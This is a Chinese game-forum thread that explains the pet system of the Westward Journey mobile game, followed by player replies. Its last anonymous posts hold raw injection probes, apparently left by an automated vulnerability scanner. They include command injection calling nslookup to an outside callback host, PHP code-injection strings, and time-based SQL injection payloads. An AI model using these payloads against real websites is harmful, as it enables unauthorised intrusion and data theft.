大话西游手游官方论坛

标题: 『大话西游』手游召唤兽系统介绍 [打印本页]

作者: 凌波、去    时间: 2015-6-8 17:37
标题: 『大话西游』手游召唤兽系统介绍

战斗系统  | 召唤兽系统   |   装备系统   |  组队系统   |   聊天系统   | 帮派系统 | 伙伴系统
>>召唤兽获得:
召唤兽有三种获得方式:捕捉合成、购买
【捕捉在野外地图战斗时,使用引妖香(长安城-杂货店老板处购买获得),能够捕捉到召唤兽。
【合成】利用五行天书就可以合成心仪的召唤兽了。
【购买】:从已经拥有的玩家那里购买心仪的召唤兽。

不同类型的召唤兽有不同的获得方式:召唤兽分为普通召唤兽、高级召唤兽、特殊召唤兽和神兽
【普通召唤兽】:在指定地图捕捉。
【高级召唤兽】:在指定地图捕捉。
【特殊召唤兽】:利用五行天书熔炼合成。
【神兽】:利用五行天书熔炼合成,部分活动也会有神兽投放。

>>召唤兽培养

召唤兽培养有5个方面:性天资、 等级培养、转生飞升、抗性修炼、学习技能。

1.【属性天资】——如何查看?如何给宝宝洗点?
>>如何查看?
点击游戏界面右上角的自己的召唤兽图标,就可以进入界面,查看宝宝的情况——气血初值、法力初值、攻击初值、速度初值。
【亲密度】:宝宝的亲密度和主人越高,战斗中的连击率、致命率和技能效果就会更好!
                    获取方法:战斗中给召唤兽加血; 召唤兽升级;人物升级;使用亲密丹(活动获得);使用驯养令
(活动获得)

点击天资,查看宝宝的天赋情况:

>>如何洗点?
初值有四个评级:资质平平、出类拔萃、妙领天机、万中无一。洗点能够改变宝宝的初值、成长率,进而影响评级                                                                                          
玩家可以:
1).使用龙之骨提升宝宝的成长率
龙之骨获得方式:主线剧情任务、挖宝、大雁塔、水陆大会、周末活动 有机会获得
商会购买获得。
2).使用金柳露对宝宝的各项初值进行洗点。
每一次洗点生成一个新的初值以及评级。对初值满意就可以点击【替换天资】,不满意再点击【金柳露】重新生成初值。

2. 【等级培养】——如何加点?如何转生?
>>如何加点?
宝宝每升一级能够获得4点潜能点。根据宝宝的不同初值,选择加点分配。
3. 【转生飞升】
达到满级的召唤兽可以找天宫的灵兽仙npc点化转生,脱胎换骨。
4. 【抗性修炼】——抗性修炼可以提高宝宝的各项抗性。

>>>修炼方式?
1)使用【经验值】转换为修炼点。
2)使用【凝魂丹】。

5. 【学习技能】——怎样解封技能?怎样学习技能?
技能分为普通技能、高级技能、终极技能,神兽技能。
普通技能:通过多宝阁获得,或者在战斗中有几率灵光闪现,领悟技能。
高级技能:通过见闻录上中下篇3份,合成高级藏宝图,在藏宝图抽奖中有几率获得。
终极技能:通过见闻录上中下篇3份,合成高级藏宝图,在藏宝图抽奖中有几率获得。
神兽技能:神兽自带技能,无法通过学习获得。

>>怎样解封技能?
明雷战斗中有一定几率解封技能格,或者使用聚魄丹开启技能格子。
>>怎样学习技能?
1.拥有天生技能
2.点击【学习技能】

注意!学习新技能时原有技能可能会被顶替!
>>召唤兽个性化
玩家可以设置召唤兽的名字,以及发动普通攻击、技能攻击时的出场语。

本资料只作参考,如与实际游戏有所不符,请告知版主,谢谢~

作者: bxrhr1314    时间: 2015-7-20 11:35
沙发,我先站了
作者: ﹎ゞ冰川、    时间: 2015-7-20 12:16
路过,顶了再看~
作者: ﹎ゞ冰川、    时间: 2015-7-20 12:25
擦 技能学习是个坑啊~
作者: 十年一觉    时间: 2015-7-20 12:42
内胆了?擦
作者: 三界妖王。    时间: 2015-7-20 13:07
说好的内丹呢
作者: 愚蠢的毛毛虫    时间: 2015-7-20 13:35
洗宝宝都要买LL
作者: 随风    时间: 2015-7-20 14:01
感觉不会再爱了
作者: 我想玩大话    时间: 2015-7-20 14:57
没提内丹的事啊,看样子没了
作者: 一位少侠    时间: 2015-7-20 17:47
很喜欢,新鲜的很
作者: 一叶一菩提    时间: 2015-7-20 18:13
为什么没有内丹????
作者: 洗洗更好看    时间: 2015-7-20 18:28
内丹呢,内丹去哪了
作者: 妖隐    时间: 2015-7-20 22:34
内丹呢内丹呢内丹呢内丹呢 #3#3#3为什么 #3为什么 #3为什么 #3
作者: 力拔山兮气盖世    时间: 2015-7-20 23:12
几点开放下载!!!!!
作者: helongjiangtao    时间: 2015-7-21 07:07
内丹呀快出来吧不要学习技能
作者: 力拔山兮气盖世    时间: 2015-7-21 10:00
每一次洗点消耗1瓶金柳露,每一次生成一个新的初值以及评级。对初值满意就可以点击【替换天资】,不满意再点击【金柳露】重新生成初值。
作者: 迷离色    时间: 2015-7-21 13:12
技能覆盖不科学啊!
作者: wumiguo    时间: 2015-7-21 14:38
苹果手机,只能看不能玩!!!快退出IOS版本啊!!!!
作者: zhongcbxfy    时间: 2015-7-22 09:44
一下子回到04年洗宝宝的时代。。
作者: 梦回紫云山    时间: 2015-7-22 20:00
飞常不错,可惜没激活码
作者: 红双囍    时间: 2015-7-27 22:30
学习学习。本来都放弃等公测了。结果下午给发了个激活码
作者: lisongh0    时间: 2015-7-30 01:08
回复能给我机会吗?
作者: qq992440215    时间: 2015-7-30 23:28
五行材料怎么得
作者: sky5127    时间: 2015-8-8 09:02
个人觉得写的很详,顶个
作者: 上仙丶白子画    时间: 2015-8-9 13:27
我要合一个神兽
作者: 专捉坏人~    时间: 2015-8-11 04:00
激活码~~~~~~
作者: 罗门    时间: 2015-11-8 17:35
得保持良好的看帖习惯,像我这样

先顶后看
作者: 枭尘    时间: 2016-2-24 19:20
提示: 该帖被管理员或版主屏蔽
作者: 枭尘    时间: 2016-2-24 19:20
技能是坑   技能是坑  技能是坑
作者: 枭尘    时间: 2016-2-24 19:21
技能shi  keng   艹  让你不让我打字
作者: 望仔    时间: 2016-2-27 01:46
刚回家还不好好v好女
作者: 小呆瓜    时间: 2016-2-28 12:56
处处回帖,节操何在?
作者: 下手太重    时间: 2016-3-4 20:42
节操怎么获得
作者: 苒苒    时间: 2016-3-14 18:38
你这个马 可是叫人伤心
作者: 獨歩兲吓    时间: 2016-3-24 19:15
像我如此没有节操之人,为了礼包处处回帖也是蛮拼的
作者: ddlddx0000    时间: 2016-6-26 17:46
1转宠物存150亿经验2转多少级
作者: ┡貪狼℡    时间: 2016-7-29 22:55
有些用。感谢。
作者: 轩辰    时间: 2016-8-5 05:33
没内丹!洗宝宝本身就是一个坑,学习技能还会顶掉原有技能?!这还是大话吗?这就是神武翻版!让老玩家情何 ... 【图片】
作者: ikiki    时间: 2016-8-8 19:51
火钳刘明啊啊啊啊啊啊啊啊啊啊啊啊
作者: 有莘不破    时间: 2016-8-21 01:19
这跟梦幻精灵回答的一样啊
作者: 邯郸锐哥    时间: 2016-8-31 12:34
好。写的不错,本身不会玩这样有谱了
作者: 简执    时间: 2016-9-28 23:25
洗宝宝是要拼人品
作者: 隠身灬守候    时间: 2016-10-4 21:49
作者: 屈无子    时间: 2016-10-22 22:54
随便看看。。。。。
作者: 致命温柔    时间: 2016-10-26 20:26
作者: 致命温柔    时间: 2016-10-26 20:28
还是内丹好
作者: 骚不行就矜持    时间: 2016-10-27 03:25
我的龙马,就差那么一点点,开区一周,我的龙马稳座第一,没想到刚过一周被万恶的万中无一顶了
作者: 爱你壹万年    时间: 2016-11-10 16:58
看了,很好很受用。值得学习。
作者: 逍遥生.    时间: 2016-11-11 01:05
和没有说了一样,没有点新鲜的,
作者: 故事……    时间: 2016-11-14 22:35
重温旧梦,哈哈记忆中的游戏。
作者: l蓝色的风    时间: 2016-11-16 23:37
路过,顶了再看~【图片】
作者: 七迦社    时间: 2016-11-18 17:45
隐隐约约隐隐约约隐隐约约有一拼
作者: 15172003764    时间: 2016-11-19 00:24
v挺好滴,我就是太蒙了,什么都不懂!
作者: 十步一人    时间: 2016-12-15 08:09
厉害,说的很有道理
作者: 匿名    时间: 2017-1-17 20:06
冰雪魔怎么加点
作者: 嗯嗯阿狸    时间: 2017-2-1 00:07
像我如此没有节操之人,为了礼包发帖也是蛮拼的。
作者: 匿名    时间: 2017-3-3 11:21
召唤兽如何转生
作者: 酆飞    时间: 2017-5-11 08:46
顶起,虽然现在没什么大用了。都是基础的东西
作者: 孤独剑客    时间: 2017-5-15 16:46
作者: 匿名    时间: 2017-12-20 06:35
作者: 匿名    时间: 2017-12-20 06:35
set|set&set
$(nslookup dns.ce.\014037.1633-659.1633.fd927.\1.bxss.me)
&nslookup dns.ce.\014037.1633-660.1633.fd927.\1.bxss.me&'\"`0&nslookup dns.ce.\014037.1633-660.1633.fd927.\1.bxss.me&`'
${9999498+9999406}
作者: 匿名    时间: 2017-12-20 06:36
!(()&&!|*|*|
作者: 匿名    时间: 2017-12-20 06:36
^(#$!@#$)(()))******
12345'"\'\");|]*{
<>
testasp.vulnweb.com
;print(md5(acunetix_wvs_security_test));
';print(md5(acunetix_wvs_security_test));$a='
";print(md5(acunetix_wvs_security_test));$a="
${@print(md5(acunetix_wvs_security_test))}
${@print(md5(acunetix_wvs_security_test))}\
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
forum.php
forum.php/.
作者: 匿名    时间: 2017-12-20 06:38
1困愧%2527%2522
作者: 匿名    时间: 2017-12-20 06:40
-1 OR 2+156-156-1=0+0+0+1 --
作者: 匿名    时间: 2017-12-20 06:40
-1 OR 3+156-156-1=0+0+0+1 --
-1 OR 2+314-314-1=0+0+0+1
-1 OR 3+314-314-1=0+0+0+1
-1' OR 2+515-515-1=0+0+0+1 --
-1' OR 3+515-515-1=0+0+0+1 --
-1' OR 2+279-279-1=0+0+0+1 or '7N9706Fd'='
-1' OR 3+279-279-1=0+0+0+1 or '7N9706Fd'='
-1" OR 2+134-134-1=0+0+0+1 --
-1" OR 3+134-134-1=0+0+0+1 --
if(now()=sysdate(),sleep(8),0)/*'XOR(if(now()=sysdate(),sleep(8),0))OR'"XOR(if(now()=sysdate(),sleep(8),0))OR"*/
(select(0)from(select(sleep(8)))v)/*'+(select(0)from(select(sleep(8)))v)+'"+(select(0)from(select(sleep(8)))v)+"*/
-1; waitfor delay '0:0:8' --
-1); waitfor delay '0:0:8' --
1 waitfor delay '0:0:8' --
EgIxaUAh'; waitfor delay '0:0:12' --
-1;select pg_sleep(12); --
-1);select pg_sleep(12); --
-1));select pg_sleep(12); --

欢迎光临 大话西游手游官方论坛 (https://dhxy.16163.com/) Powered by Discuz! X3.3